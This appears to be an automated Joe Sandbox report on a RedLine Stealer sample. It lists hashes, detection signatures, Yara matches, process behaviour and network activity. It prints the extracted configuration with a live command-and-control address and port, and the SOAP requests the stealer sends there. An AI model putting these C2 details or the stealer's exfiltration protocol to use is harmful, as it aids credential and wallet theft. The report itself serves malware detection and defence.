Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b3u71vBG0u.exe

Overview

General Information

Sample name:b3u71vBG0u.exe
renamed because original name is a hash value
Original sample name:464709f3215d06f6703eb4ecb607ae7a.exe
Analysis ID:1464015
MD5:464709f3215d06f6703eb4ecb607ae7a
SHA1:1f438f2ab699f842cec119981ae5bf799df5d203
SHA256:a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36
Tags:32exeRedLineStealertrojan
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • b3u71vBG0u.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\b3u71vBG0u.exe" MD5: 464709F3215D06F6703EB4ECB607AE7A)
    • RegSvcs.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\b3u71vBG0u.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x135ca:$a4: get_ScannedWallets
          • 0x12428:$a5: get_ScanTelegram
          • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
          • 0x1106a:$a7: <Processes>k__BackingField
          • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1099e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1048a:$u7: RunPE
          • 0x13b41:$u8: DownloadAndEx
          • 0x9130:$pat14: , CommandLine:
          • 0x13079:$v2_1: ListOfProcesses
          • 0x1068b:$v2_2: get_ScanVPN
          • 0x1072e:$v2_2: get_ScanFTP
          • 0x1141e:$v2_2: get_ScanDiscord
          • 0x1240c:$v2_2: get_ScanSteam
          • 0x12428:$v2_2: get_ScanTelegram
          • 0x124ce:$v2_2: get_ScanScreen
          • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
          • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
          • 0x13509:$v2_2: get_ScanBrowsers
          • 0x135ca:$v2_2: get_ScannedWallets
          • 0x135f0:$v2_2: get_ScanWallets
          • 0x13610:$v2_3: GetArguments
          • 0x11cd9:$v2_4: VerifyUpdate
          • 0x165ee:$v2_4: VerifyUpdate
          • 0x139ca:$v2_5: VerifyScanRequest
          • 0x130c6:$v2_6: GetUpdates
          • 0x165cf:$v2_6: GetUpdates
          00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            0.2.b3u71vBG0u.exe.23a0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.b3u71vBG0u.exe.23a0000.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.2.b3u71vBG0u.exe.23a0000.1.raw.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                • 0x135ca:$a4: get_ScannedWallets
                • 0x12428:$a5: get_ScanTelegram
                • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                • 0x1106a:$a7: <Processes>k__BackingField
                • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                • 0x1099e:$a9: <ScanFTP>k__BackingField
                0.2.b3u71vBG0u.exe.23a0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x1048a:$u7: RunPE
                • 0x13b41:$u8: DownloadAndEx
                • 0x9130:$pat14: , CommandLine:
                • 0x13079:$v2_1: ListOfProcesses
                • 0x1068b:$v2_2: get_ScanVPN
                • 0x1072e:$v2_2: get_ScanFTP
                • 0x1141e:$v2_2: get_ScanDiscord
                • 0x1240c:$v2_2: get_ScanSteam
                • 0x12428:$v2_2: get_ScanTelegram
                • 0x124ce:$v2_2: get_ScanScreen
                • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                • 0x13509:$v2_2: get_ScanBrowsers
                • 0x135ca:$v2_2: get_ScannedWallets
                • 0x135f0:$v2_2: get_ScanWallets
                • 0x13610:$v2_3: GetArguments
                • 0x11cd9:$v2_4: VerifyUpdate
                • 0x165ee:$v2_4: VerifyUpdate
                • 0x139ca:$v2_5: VerifyScanRequest
                • 0x130c6:$v2_6: GetUpdates
                • 0x165cf:$v2_6: GetUpdates
                0.2.b3u71vBG0u.exe.23a0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 7 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 1.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
                  Source: http://185.38.142.10:7474Virustotal: Detection: 11%Perma Link
                  Source: http://185.38.142.10:7474/Virustotal: Detection: 11%Perma Link
                  Source: 185.38.142.10:7474Virustotal: Detection: 11%Perma Link
                  Source: b3u71vBG0u.exeVirustotal: Detection: 63%Perma Link
                  Source: b3u71vBG0u.exeReversingLabs: Detection: 60%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: b3u71vBG0u.exeJoe Sandbox ML: detected
                  Source: b3u71vBG0u.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007A4696
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AC93C FindFirstFileW,FindClose,0_2_007AC93C
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007AC9C7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AF200
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AF35D
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007AF65E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A3A2B
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A3D4E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007ABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007ABF27

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 185.38.142.10:7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49734
                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 185.38.142.10:7474
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 987505Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 987497Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: NETSOLUTIONSNL NETSOLUTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007B25E2
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474/
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                  Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007B425A
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007B4458
